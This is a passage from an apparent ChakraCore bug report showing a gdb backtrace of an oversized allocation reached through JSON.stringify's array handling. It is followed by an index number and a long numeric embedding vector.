Memory::Recycler::LargeAlloc<false> (this=0x5565363a1a48, heap=0x5565363a64a0, size=44070649568, attributes=Memory::WithBarrierBit) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.cpp:1380 #5 0x0000556532ecf90b in Memory::Recycler::RealAlloc<(Memory::ObjectInfoBits)256, false> (this=0x5565363a1a48, heap=0x5565363a64a0, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.inl:384 #6 0x0000556532ecf4ec in Memory::Recycler::AllocWithAttributesInlined<(Memory::ObjectInfoBits)256, false> (this=0x5565363a1a48, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.inl:108 #7 0x0000556532f793ad in Memory::Recycler::AllocZeroWithAttributesInlined<(Memory::ObjectInfoBits)256, false> (this=0x5565363a1a48, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.inl:229 #8 0x0000556532f79369 in Memory::Recycler::AllocZeroWithAttributes<(Memory::ObjectInfoBits)256, false> (this=0x5565363a1a48, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.h:1598 #9 0x0000556532f78e49 in Memory::Recycler::AllocZero (this=0x5565363a1a48, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.h:1360 #10 0x0000556532f790ba in operator new<Memory::Recycler> (byteSize=8, alloc=0x5565363a1a48, AllocFunc=(char *(Memory::Recycler::*)(Memory::Recycler * const, size_t)) 0x556532f78e10 <Memory::Recycler::AllocZero(unsigned long)>, plusSize=44070649560) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/DataStructures/../Memory/Allocator.h:513 #11 0x000055653490d281 in Js::JSONStringifier::ReadArray (this=0x7ffe2d47abb8, arr=0x7f0b964a22a0, objectStack=0x7ffe2d47abe8) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JSONStringifier.cpp:407 #12 0x000055653490bf6e in Js::JSONStringifier::ReadProperty (this=0x7ffe2d47abb8, key=0x7f0b964b1450, holder=0x0, prop=0x7f0b9647f360, value=0x7f0b964a22a0, --Type <RET> for more, q to quit, c to continue without paging-- 47abe8) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JSONStringifier.cpp:877 #13 0x000055653490bac3 in Js::JSONStringifier::Stringify (scriptContext=0x5565363cf488, value=0x7f0b964a22a0, replacer=0x0, space=0x7f0b964b5020) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JSONStringifier.cpp:196 #14 0x00005565348feaa1 in JSON::Stringify (function=0x7f0b96482600, callInfo=...) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JSON.cpp:141 #15 0x00005565340a56ee in amd64_CallFunction () at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100 #16 0x0000556533c73f7a in Js::JavascriptFunction::CallFunction<true> (function=0x7f0b96482600, entryPoint=0x5565348fdf00 <JSON::Stringify(Js::RecyclableObject*, Js::CallInfo, ...)>, args=..., useLargeArgCount=false) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:1364 #17 0x00005565339d426f in Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (this=0x7ffe2d47c170, playout=0x7f0b964fd4a5, function=0x7f0b96482600, flags=16, spreadIndices=0x0) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:3973 #18 0x00005565339d3b29 in Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (this=0x7ffe2d47c170, playout=0x7f0b964fd4a5, function=0x7f0b96482600, flags=0, profileId=0, inlineCacheIndex=0, spreadIndices=0x0) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:4016 #19 0x000055653382ce16 in Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > >(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > const __unaligned*) (this=0x7ffe2d47c170, playout=0x7f0b964fd4a5) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/./Language/InterpreterStackFrame.h:520 #20 0x000055653381c43b in Js::InterpreterStackFrame::ProcessProfiled (this=0x7ffe2d47c170) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterHandler.inl:91 #21 0x000055653378731f in Js::InterpreterStackFrame::Process (this=0x7ffe2d47c170) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:3472 #22 0x0000556533784e11 in Js::InterpreterStackFrame::InterpreterHelper (function=0x7f0b964b66e0, args=..., returnAddress=0x7f0b960d0fa2, addressOfReturnAddress=0x7ffe2d47c728, asmJsReturn=0x0) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:2153 #23 0x0000556533783678 in Js::InterpreterStackFrame::InterpreterThunk (layout=0x7ffe2d47c740) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:1833 #24 0x00007f0b960d0fa2 in ?? () #25 0x00007ffe2d47c750 in ?? () #26 0x00005565340a56ee in amd64_CallFunction () at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100 ``` --- end body ---
7,105
[ -0.05050230398774147, -0.019485393539071083, -0.004496014676988125, 0.022583888843655586, 0.013919278047978878, -0.00952707976102829, -0.018527094274759293, 0.025394897907972336, -0.04679688438773155, -0.004300362430512905, -0.005558128468692303, 0.025442812591791153, 0.01565220020711422, 0.02208876982331276, 0.025203237310051918, -0.023765791207551956, -0.029291976243257523, -0.016259122639894485, -0.011483604088425636, -0.02793438732624054, -0.010517320595681667, 0.014382455497980118, 0.0035596778616309166, 0.014262668788433075, -0.013296384364366531, -0.0009413281222805381, 0.021082555875182152, -0.011371802538633347, -0.019884683191776276, 0.01550047006458044, -0.010828766971826553, 0.013488044030964375, -0.029547521844506264, -0.013112710788846016, 0.04146236181259155, 0.02160961925983429, 0.018223633989691734, 0.026704570278525352, 0.004879334010183811, -0.02652888372540474, -0.0014274647692218423, -0.024835890159010887, -0.02341441437602043, 0.01686604507267475, 0.015181037597358227, 0.03603200614452362, 0.0311926007270813, -0.014150867238640785, -0.03488204628229141, 0.02060340717434883, 0.034211236983537674, -0.011124243028461933, 0.002463624347001314, -0.07398060709238052, 0.02042771875858307, -0.024947691708803177, 0.029755152761936188, -0.023622045293450356, 0.024149110540747643, 0.02689623087644577, 0.005901518743485212, -0.03925827518105507, 0.001758876140229404, 0.00529858935624361, -0.010389547795057297, 0.03127245977520943, -0.03382791951298714, 0.038459692150354385, 0.004811454564332962, 0.028988514095544815, -0.021737392991781235, -0.010094072669744492, 0.03173563629388809, 0.046413566917181015, 0.003813227405771613, -0.020667294040322304, 0.006508440710604191, 0.04727603495121002, -0.016450783237814903, 0.012322114780545235, -0.01128395926207304, 0.03948187828063965, -0.019453449174761772, 0.01343214325606823, 0.011627349071204662, -0.008257334120571613, -0.022663747891783714, -0.07889986783266068, -0.015428598038852215, -0.03350848704576492, -0.0005400408408604562, 0.03366820141673088, 0.0020643335301429033, 0.025474755093455315, -0.0038491636514663696, 0.016594527289271355, -0.06260880082845688, -0.020635349676012993, -0.046860773116350174, 0.03023430146276951, -0.023957449942827225, -0.007438788190484047, -0.017121590673923492, 0.03577645868062973, -0.023446356877684593, 0.028094103559851646, -0.0024296846240758896, -0.007574547082185745, 0.04909680038690567, 0.1098848357796669, 0.018447237089276314, -0.018255576491355896, -0.04069572314620018, -0.016594527289271355, 0.0025315037928521633, 0.010525306686758995, 0.018654868006706238, -0.0066002774983644485, -0.04401782155036926, 0.008864256553351879, -0.017696570605039597, -0.02619347907602787, -0.023031095042824745, 0.011803037486970425, -0.02860519476234913, 0.04107904061675072, -0.0023757803719490767, -0.017329221591353416, -0.007191227748990059, -0.013320342637598515, -0.06468511372804642, -0.03778888285160065, -0.004044816363602877, -0.005973390769213438, 0.04146236181259155, -0.022488059476017952, 0.003513759234920144, 0.04350673034787178, 0.004603823181241751, -0.015636229887604713, -0.04657328128814697, -0.030106529593467712, 0.008608710020780563, 0.006720064673572779, 0.0074108378030359745, -0.008576767519116402, -0.00001988655458262656, 0.018862498924136162, -0.044305309653282166, 0.009646866470575333, -0.011531519703567028, -0.01905415952205658, 0.00622494425624609, 0.03615977615118027, 0.00021312148601282388, -0.015396654605865479, 0.0030785324051976204, 0.03600006178021431, -0.011691235937178135, -0.015364711172878742, -0.01281723566353321, -0.04114292934536934, 0.017600739374756813, -0.037277791649103165, -0.025874046608805656, -0.014462313614785671, 0.0014993370277807117, 0.025858074426651, 0.004292376339435577, 0.008305249735713005, -0.045231666415929794, 0.022392230108380318, 0.035457026213407516, 0.022136684507131577, -0.015444569289684296, -0.019581222906708717, 0.011946781538426876, 0.023398442193865776, 0.0013416172005236149, -0.015125136822462082, 0.025075463578104973, 0.02557058446109295, 0.004496014676988125, 0.015173051506280899, 0.0075545827858150005, -0.02130615897476673, -0.005941447801887989, -0.019006242975592613, 0.004388206172734499, -0.003465844551101327, 0.013512002304196358, -0.012401972897350788, 0.010964525863528252, -0.007438788190484047, 0.032470330595970154, -0.00787002220749855, -0.028541309759020805, -0.0325981043279171, 0.013248469680547714, -0.028956571593880653, 0.035936176776885986, -0.016338981688022614, -0.02205682545900345, -0.01246585976332426, -0.0697002112865448, -0.003972943872213364, 0.009159731678664684, -0.02189710922539234, 0.04558304324746132, -0.006979603786021471, 0.0044840360060334206, 0.016434811055660248, 0.006847837939858437, -0.014925491064786911, -0.03631949424743652, 0.012002682313323021, -0.02397342212498188, 0.002176135079935193, -0.01831946335732937, -0.019453449174761772, 0.030905110761523247, -0.016291065141558647, -0.0023178833071142435, -0.012146427296102047, -0.03296545147895813, -0.008832313120365143, 0.012034625746309757, 0.003096500411629677, -0.04373033344745636, 0.007598504424095154, 0.01374359056353569, 0.003699429566040635, -0.010062129236757755, 0.0024276883341372013, 0.04072766378521919, 0.0070794266648590565, 0.005554135423153639, -0.03395569324493408, 0.013831434771418571, 0.01961316540837288, 0.031543977558612823, 0.023845648393034935, -0.025394897907972336, -0.023701904341578484, 0.019149988889694214, 0.04331506788730621, -0.06308795511722565, 0.00047191185876727104, -0.026433052495121956, 0.01675424352288246, -0.009159731678664684, -0.022104740142822266, -0.018143774941563606, -0.023845648393034935, 0.01967705227434635, 0.009559022262692451, 0.0379486009478569, 0.019469421356916428, -0.01624315045773983, 0.0016241155099123716, 0.027950357645750046, 0.018654868006706238, -0.025730300694704056, 0.008792384527623653, 0.007063454948365688, 0.003707415424287319, -0.025538641959428787, -0.003753333818167448, -0.011156185530126095, -0.026257365942001343, 0.04015268757939339, -0.007738256361335516, -0.013703661039471626, -0.005390426144003868, -0.021322131156921387, 0.01768059842288494, -0.002868904732167721, -0.0024316811468452215, -0.00340794725343585, 0.010149973444640636, 0.02256791852414608, 0.003044592682272196, 0.007574547082185745, 0.06765583902597427, -0.01478174701333046, 0.010772867128252983, 0.026544854044914246, -0.02315886877477169, -0.0062289368361234665, -0.016562582924962044, -0.022408202290534973, -0.007143313065171242, -0.023318585008382797, 0.010788838379085064, 0.017840314656496048, -0.0005140869761817157, 0.022583888843655586, 0.023031095042824745, 0.015236938372254372, 0.00668812170624733, -0.033284883946180344, -0.04510389268398285, -0.016283079981803894, -0.0011958760442212224, -0.054591041058301926, 0.004675695672631264, -0.003831195645034313, -0.01879861205816269, 0.0012088529765605927, 0.01638689637184143, 0.049224574118852615, -0.023079009726643562, -0.015348739922046661, -0.034722331911325455, -0.0040607876144349575, -0.0011469628661870956, 0.035169538110494614, -0.003350050188601017, -0.0314800888299942, 0.005378447473049164, -0.03382791951298714, -0.02267972007393837, -0.03641532361507416, 0.012625575996935368, 0.04002491384744644, 0.01209851261228323, -0.04424142464995384, 0.025251151993870735, -0.048489879816770554, 0.019437476992607117, -0.007450766861438751, -0.043347012251615524, -0.029132260009646416, -0.0040188622660934925, -0.01846320740878582, -0.006212965585291386, -0.03242241591215134, 0.017185477539896965, -0.008736483752727509, 0.0167223010212183, 0.014086980372667313, -0.017936144024133682, -0.01601954735815525, -0.017728513106703758, 0.01609940640628338, -0.0038351884577423334, -0.019772881641983986, -0.015867818146944046, 0.0136317890137434, 0.021290186792612076, 0.0011449664598330855, 0.04625384882092476, -0.0025993832387030125, 0.05637986585497856, 0.04823433235287666, -0.03718196228146553, -0.018638895824551582, -0.006416603922843933, -0.004104709718376398, -0.016227180138230324, 0.009758668020367622, 0.021960996091365814, 0.003395968582481146, 0.010565235279500484, 0.00048339145723730326, -0.012833207845687866, 0.038715239614248276, 0.005266645923256874, -0.03804443031549454, -0.021785307675600052, -0.0022000924218446016, 0.02793438732624054, -0.013056810013949871, 0.00408873800188303, -0.017600739374756813, -0.049927327781915665, 0.01675424352288246, -0.019245818257331848, -0.01815974712371826, 0.02475603111088276, -0.0014723849017173052, -0.008305249735713005, 0.037309736013412476, -0.024149110540747643, 0.03408346697688103, 0.006640206556767225, -0.01790420152246952, 0.05711456015706062, -0.00588155398145318, 0.0033360749948769808, -0.006093177944421768, 0.027662869542837143, -0.035616740584373474, -0.02335052751004696, 0.0017698566662147641, 0.049927327781915665, -0.0012777306837961078, -0.019181931391358376, -0.004831419326364994, -0.04817044734954834, -0.006847837939858437, 0.017696570605039597, 0.003962961491197348, 0.014717860147356987, 0.01809586025774479, 0.017361165955662727, -0.009015986695885658, -0.03023430146276951, 0.02267972007393837, 0.005082972347736359, 0.03071345016360283, -0.03996102511882782, -0.003641532501205802, 0.029659323394298553, 0.028333676978945732, 0.002811007434502244, 0.03967353701591492, -0.013184583745896816, -0.032470330595970154, -0.001234806957654655, -0.05701873078942299, -0.02723163552582264, 0.014126909896731377, 0.010565235279500484, -0.019453449174761772, -0.006512433290481567, -0.017776427790522575, -0.004272412043064833, -0.021002698689699173, -0.013384228572249413, -0.015724072232842445, 0.023909535259008408, 0.009734710678458214, 0.035201478749513626, -0.024372711777687073, -0.013048824854195118, -0.02419702522456646, -0.012250242754817009, -0.0251553226262331, -0.0076064905151724815, 0.026257365942001343, 0.03181549534201622, -0.0017938141245394945, -0.015787959098815918, -0.015572342090308666, -0.008936128579080105, -0.047371864318847656, 0.007283065002411604, 0.02031591720879078, 0.012505789287388325, 0.015620257705450058, -0.009039944037795067, -0.007386880461126566, 0.016370924189686775, 0.020842982456088066, -0.0019495375454425812, -0.0014154859818518162, -0.010541277937591076, 0.014302597381174564, -0.009183689020574093, 0.0016560587100684643, 0.007187235169112682, 0.0007786171045154333, 0.045231666415929794, 0.004971170797944069, 0.027183720842003822, 0.011715193279087543, -0.057370107620954514, 0.023190811276435852, -0.018111832439899445, 0.0074827102944254875, -0.007015539798885584, -0.010165944695472717, 0.022264456376433372, -0.013623802922666073, 0.0038910892326384783, 0.018031973391771317, -0.005570107139647007, 0.005973390769213438, -0.03210298344492912, 0.0017898211954161525, -0.019932597875595093, -0.029467662796378136, 0.03274184837937355, 0.014086980372667313, -0.00888022780418396, -0.014190795831382275, -0.0007960860966704786, 0.03063359297811985, 0.02478797547519207, 0.027918415144085884, -0.0009233600576408207, -0.03922633081674576, -0.02897254377603531, -0.010764881037175655, -0.017041733488440514, -0.02501157857477665, -0.030362075194716454, 0.029835011810064316, 0.04066377878189087, 0.009479164145886898, -0.06513231992721558, 0.0373736210167408, -0.01843126490712166, 0.022392230108380318, -0.03437095507979393, -0.008464965969324112, 0.04254843294620514, -0.007901965640485287, -0.06644199788570404, 0.008157512173056602, -0.05487853288650513, 0.004392199218273163, -0.01350401621311903, -0.023366499692201614, -0.03195923939347267, -0.008425036445260048, 0.0015532413963228464, 0.04769129678606987, 0.049192629754543304, -0.019708994776010513, -0.014470299705862999, -0.037980545312166214, 0.0193895623087883, 0.010453433729708195, -0.004563894122838974, 0.012162398546934128, 0.004092731047421694, 0.002643305342644453, -0.02346232905983925, -0.02049160562455654, 0.006544376723468304, -0.015811916440725327, 0.047595467418432236, 0.0032542203553020954, -0.02453242801129818, -0.005570107139647007, 0.0037932628765702248, 0.0008325214148499072, -0.007734263315796852, 0.010205873288214207, 0.0393541045486927, -0.03334876894950867, 0.011387774720788002, 0.018622923642396927, 0.02456437237560749, 0.006644199602305889, -0.00875245500355959, -0.010677036829292774, 0.006280845031142235, 0.013903306797146797, -0.005350497085601091, -0.022024882957339287, -0.0008559797424823046, -0.004771525505930185, -0.017584769055247307, 0.002172142034396529, 0.019373591989278793, 0.00008759442425798625, 0.0023638017009943724, -0.010748908855021, 0.007139320019632578, 0.011515547521412373, -0.009646866470575333, -0.02082701027393341, 0.000582465494517237, 0.007626454811543226, 0.04567887261509895, -0.0365430973470211, 0.000008274366336991079, 0.025666415691375732, -0.012234271503984928, -0.010213859379291534, -0.03325293958187103, -0.00817747600376606, -0.004755553789436817, -0.026241393759846687, -0.012170384638011456, -0.0024456563405692577, -0.0067040929570794106, 0.013703661039471626, -0.024181053042411804, -0.002395744901150465, 0.047595467418432236, -0.004979156889021397, -0.028621166944503784, 0.018814584240317345, -0.025522669777274132, -0.007714299019426107, -0.014885562472045422, -0.010070114396512508, -0.016434811055660248, -0.03255018964409828, -0.003817220451310277, 0.008944114670157433, -0.014174824580550194, -0.003126447321847081, -0.000938832585234195, -0.0027251599822193384, -0.009399306029081345, 0.003577645868062973, 0.012250242754817009, -0.012513774447143078, -0.03600006178021431, -0.021338101476430893, 0.054143838584423065, 0.008936128579080105, 0.010277746245265007, -0.02042771875858307, 0.0331571102142334, 0.0006877784617245197, 0.026257365942001343, 0.030282216146588326, -0.012146427296102047, -0.018479179590940475, 0.01244988851249218, -0.01550047006458044, 0.009758668020367622, -0.026241393759846687, 0.024724088609218597, 0.02082701027393341, -0.052035581320524216, 0.008009773679077625, -0.020395776256918907, 0.01669035665690899, 0.013064796105027199, -0.027870500460267067, -0.022775549441576004, 0.009758668020367622, -0.011866923421621323, -0.012018654495477676, 0.010070114396512508, 0.00669610733166337, -0.04449697211384773, -0.00836115051060915, 0.04532749578356743, 0.022392230108380318, 0.011220072396099567, 0.0036535111721605062, -0.027982302010059357, -0.0034319048281759024, 0.033284883946180344, -0.010485377162694931, -0.02785452827811241, -0.030553733929991722, 0.00038930855225771666, -0.012018654495477676, -0.001869679312221706, 0.007223171181976795, 0.018990272656083107, 0.009183689020574093, -0.0004968675202690065, 0.01248981710523367, 0.011723178438842297, 0.015548384748399258, 0.00954305101186037, 0.055996548384428024, 0.04813850298523903, -0.009854497388005257, 0.018830556422472, -0.04229288548231125, -0.02130615897476673, -0.008512880653142929, 0.003228266490623355, 0.023781761527061462, -0.016961874440312386, -0.037341680377721786, 0.024612287059426308, -0.0034159331116825342, 0.022408202290534973, 0.013368257321417332, -0.005098944064229727, -0.002056347904726863, -0.0027890463825315237, -0.010812795720994473, -0.032869622111320496, -0.014869590289890766, 0.008241362869739532, -0.00715928478166461, 0.018175719305872917, 0.002699206117540598, -0.002583411755040288, -0.0034678408410400152, -0.010589192621409893, -0.03245436027646065, 0.0027690818533301353, -0.03018638677895069, 0.012585647404193878, 0.005713851656764746, -0.022663747891783714, -0.0015801935223862529, 0.011507561430335045, 0.021433932706713676, 0.0055940644815564156, 0.02267972007393837, 0.0009143759962171316, 0.015236938372254372, -0.010014214552938938, -0.01191483810544014, -0.023334557190537453, -0.007275078911334276, -0.006220951210707426, 0.006919709965586662, 0.025586556643247604, -0.0033780005760490894, 0.0393541045486927, 0.0030785324051976204, -0.005035057198256254, 0.011204101145267487, 0.011252015829086304, -0.0042564403265714645, 0.012409958988428116, -0.040791552513837814, 0.008768427185714245, 0.00965485256165266, -0.008800369687378407, 0.033764034509658813, 0.0057737454771995544, 0.0014494257047772408, 0.00046492426190525293, -0.03277379274368286, -0.007973837666213512, -0.032134927809238434, -0.03941798955202103, 0.006328759714961052, -0.003883103374391794, -0.008425036445260048, 0.0042564403265714645, -0.0015512448735535145, 0.0044121635146439075, -0.0033201032783836126, -0.03440289944410324, -0.0003461352316662669, 0.014526200480759144, -0.05631598085165024, 0.04647745192050934, 0.006360703147947788, 0.021497817710042, -0.01756879687309265, 0.027583010494709015, 0.008632668294012547, 0.0011319895274937153, -0.008520866744220257, -0.002583411755040288, -0.00002589151517895516, -0.005602050572633743, -0.013424158096313477, 0.0028609188739210367, -0.03360431641340256, 0.002068326575681567, -0.028477422893047333, 0.04395393654704094, 0.015005349181592464, 0.02363801747560501, 0.0035057736095041037, 0.027982302010059357, -0.019469421356916428, -0.010173930786550045, -0.004054798278957605, 0.02357413060963154, 0.016227180138230324, 0.01202663965523243, -0.02293526567518711, 0.03571257367730141, 0.01761671155691147, -0.008321220986545086, 0.017856286838650703, -0.04085543751716614, 0.007239142898470163, -0.0020743159111589193, 0.0003294149355497211, -0.0337320901453495, -0.00813754741102457, 0.006408617831766605, 0.013368257321417332, -0.027167748659849167, -0.032166868448257446, 0.022967208176851273, 0.013208541087806225, 0.01291306596249342, -0.02357413060963154, 0.02183322235941887, -0.01466994546353817, 0.010429476387798786, 0.010333647020161152, 0.014166838489472866, 0.01256169006228447, -0.00015909243666101247, 0.038683295249938965, 0.02711983397603035, -0.013951221480965614, -0.03437095507979393, 0.06458928436040878, 0.01209851261228323, -0.03389180451631546, -0.043347012251615524, -0.002579418709501624, 0.004991135559976101, -0.012737377546727657, -0.037086132913827896, 0.01372761931270361, 0.016530640423297882, 0.003825206309556961, 0.02430882677435875, -0.005414383485913277, -0.016993818804621696, -0.004192553926259279, -0.021705450490117073, -0.029435720294713974, 0.023318585008382797, 0.0009028963977470994, 0.014717860147356987, -0.014510229229927063, -0.0032661990262567997, 0.014486271888017654, -0.00479148980230093, 0.0002572930243331939, -0.024516457691788673, -0.0018956332933157682, 0.05050230398774147, -0.012825221754610538, -0.009870469570159912, 0.05682707205414772, -0.031096769496798515, 0.001286714687012136, 0.031176628544926643, 0.04274009168148041, 0.009151745587587357, 0.008968072012066841, 0.008281291462481022, -0.015604285523295403, -0.02323872596025467, -0.013831434771418571, 0.0003985421499237418, -0.028956571593880653, 0.02641708217561245, -0.01857500895857811, -0.007718291599303484, -0.0044121635146439075, 0.054591041058301926, -0.0011080320691689849, -0.0015382679412141442, 0.023781761527061462, -0.0007826100336387753, -0.0186868105083704, -0.023398442193865776, -0.01400712225586176, 0.02312692441046238, -0.01176310796290636, -0.018399322405457497, 0.03208701312541962, 0.017009789124131203, -0.0006378670805133879, 0.028541309759020805, -0.010988484136760235, 0.0017858282662928104, 0.012018654495477676, -0.015748031437397003, 0.007905958220362663, 0.004048808943480253, 0.024915747344493866, 0.028237847611308098, -0.01916595920920372, -0.02501157857477665, 0.004683681298047304, -0.009095844812691212, -0.011627349071204662, -0.04274009168148041, -0.006716071628034115, 0.002299915300682187, 0.007678362540900707, -0.03759722411632538, 0.026033762842416763, -0.004464071709662676, 0.00008260329195763916, 0.009838526137173176, -0.0017828335985541344, -0.0079379016533494, 0.014278640039265156, 0.02489977702498436, 0.01548449881374836, 0.004619794897735119, -0.02352621592581272, -0.01972496695816517, 0.02242417261004448, -0.009239589795470238, 0.0037034223787486553, -0.012218299321830273, -0.03004264272749424, -0.03235853090882301, 0.0014883566182106733, -0.009734710678458214, -0.011515547521412373, -0.011028412729501724, 0.04088738188147545, 0.02945169247686863, -0.008888213895261288, -0.003637539455667138, 0.02264777570962906, -0.005031064618378878, -0.015173051506280899, -0.03555285558104515, -0.02130615897476673, -0.005630000960081816, -0.012122469954192638, 0.010301703587174416, 0.04676494374871254, 0.0010910622077062726, -0.006971618160605431, 0.0018557041184976697, 0.02045966312289238, 0.00668812170624733, -0.004999121185392141, -0.028253819793462753, -0.004136653151363134, -0.006360703147947788, -0.042165111750364304, 0.014182810671627522, -0.011643320322036743, 0.036095891147851944, -0.014398427680134773, -0.003531727474182844, 0.01062113605439663, 0.008584752678871155, -0.009255561977624893, -0.00703949760645628, -0.032246727496385574, -0.018063917756080627, -0.006460525561124086, 0.02315886877477169, -0.007654405198991299, -0.004388206172734499, 0.0093434052541852, 0.003994904924184084, 0.051077283918857574, 0.009511107578873634, 0.02501157857477665, -0.006612256169319153, -0.04063183441758156, -0.0351375937461853, 0.008760441094636917, 0.00630879495292902, 0.02933989092707634, 0.003282170742750168, 0.008089632727205753, 0.007259107194840908, -0.011571448296308517, -0.031543977558612823, 0.006089185364544392, 0.007578540127724409, -0.04005685821175575, -0.0013915285235270858, 0.021817252039909363, -0.012370030395686626, -0.013384228572249413, 0.02900448627769947, -0.012984937988221645, 0.012282186187803745, -0.024851862341165543, 0.008225391618907452, 0.0165785551071167, -0.00817747600376606, 0.021338101476430893, -0.01117215771228075, 0.023079009726643562, 0.017137562856078148, -0.04695660248398781, 0.010078100487589836, 0.006708086002618074, -0.03967353701591492, -0.0016800161683931947, 0.008337192237377167, 0.01691395975649357, 0.03861941024661064, -0.013184583745896816, 0.006943667773157358, 0.019293732941150665, -0.02135407365858555, 0.0023558158427476883, 0.007127341348677874, 0.01178706530481577, -0.007454759906977415, -0.007247128523886204, -0.04414559528231621, 0.0012637554900720716, -0.009758668020367622, 0.022168627008795738, 0.013575888238847256, -0.02456437237560749, 0.004144638776779175, 0.00005502726708073169, -0.0018307485152035952, 0.022168627008795738, -0.030921082943677902, -0.009000015445053577, -0.01626710779964924, -0.006875788327306509, -0.01894235797226429, -0.030553733929991722, -0.012274200096726418, -0.024947691708803177, -0.019916627556085587, 0.014981391839683056, 0.02282346412539482, -0.011068342253565788, 0.0013875355944037437, -0.013184583745896816, 0.019661080092191696, -0.0251553226262331, -0.002942773513495922, -0.00599335553124547, 0.0073589300736784935, 0.016115378588438034, 0.008520866744220257, 0.01385539211332798, 0.0037653124891221523, -0.006296816281974316, 0.028253819793462753, 0.019708994776010513, 0.03085719607770443, -0.010852725245058537, -0.004336298443377018, -0.004823433235287666, -0.026177506893873215, 0.007263100240379572, 0.03746945038437843, -0.004631773568689823, 0.0014404417015612125, 0.004975163843482733, 0.006364695727825165, -0.012809249572455883, -0.016203222796320915, -0.00212223082780838, -0.003096500411629677, 0.0003651015576906502, -0.00036884492146782577, 0.016123363748192787, -0.020858952775597572, -0.0031603870447725058, 0.02194502390921116, 0.061107467859983444, 0.01646675355732441, -0.0064964620396494865, -0.003745347959920764, -0.012082540430128574, 0.0036215679720044136, 0.007470731623470783, 0.009327434003353119, 0.010980498045682907, -0.015228952281177044, 0.0209388118237257, -0.002098273253068328, 0.04226094111800194, -0.027630925178527832, 0.030282216146588326, -0.011779079213738441, -0.002415709663182497, -0.02849339321255684, 0.0030266244430094957, 0.019740939140319824, -0.013064796105027199, -0.0008145532920025289, 0.007546596694737673, -0.02945169247686863, -0.02231237106025219, -0.0293718334287405, -0.009798597544431686, -0.0018027981277555227, -0.009239589795470238, 0.01139576081186533, 0.010549264028668404, 0.018527094274759293, -0.011555477045476437, -0.031991180032491684, 0.011220072396099567, -0.02071520872414112, 0.01059717871248722, 0.011571448296308517, 0.008441008627414703, -0.01838335022330284, 0.015077222138643265, 0.0004893808509223163, -0.006380667444318533, 0.0018866491736844182, -0.04280397668480873, -0.011771094053983688, -0.011715193279087543, -0.021561704576015472, -0.010573221370577812, -0.021960996091365814, -0.02082701027393341, 0.004855376668274403, -0.023653989657759666, 0.014222739264369011, -0.02360607497394085, -0.0002433178451610729, 0.006037277635186911, 0.11589017510414124, 0.0027091882657259703, 0.0002919814141932875, -0.001872673979960382, -0.0027690818533301353, -0.029691265895962715, 0.023190811276435852, 0.001001720898784697, 0.037980545312166214, -0.021066583693027496, 0.03504176437854767, 0.007035504560917616, -0.0037054189015179873, -0.004068773705512285, 0.01513312291353941, 0.028142018243670464, -0.016059476882219315, 0.000043797212128993124, 0.02338247187435627, -0.03440289944410324, 0.023653989657759666, 0.014398427680134773, -0.0017528868047520518, 0.002106259111315012, 0.023174840956926346, 0.006288830656558275, -0.022264456376433372, -0.02060340717434883, -0.05353691428899765, -0.015093193389475346, 0.0050150929018855095, 0.009031958878040314, -0.007642426528036594, -0.0026153549551963806, 0.010661065578460693, 0.0051907808519899845, 0.00875245500355959, 0.012386001646518707, -0.004396192263811827, -0.023063039407134056, 0.005633993539959192, -0.022248486056923866, -0.026960117742419243, 0.006332752760499716, -0.00352374161593616, -0.00813754741102457, 0.019006242975592613, -0.01443037111312151, -0.019549278542399406, 0.031575918197631836, 0.0004841401241719723, -0.026401109993457794, 0.014366484247148037, -0.016235165297985077, 0.023286640644073486, 0.015859831124544144, -0.02956349402666092, 0.005665936972945929, -0.008968072012066841, -0.00703949760645628, 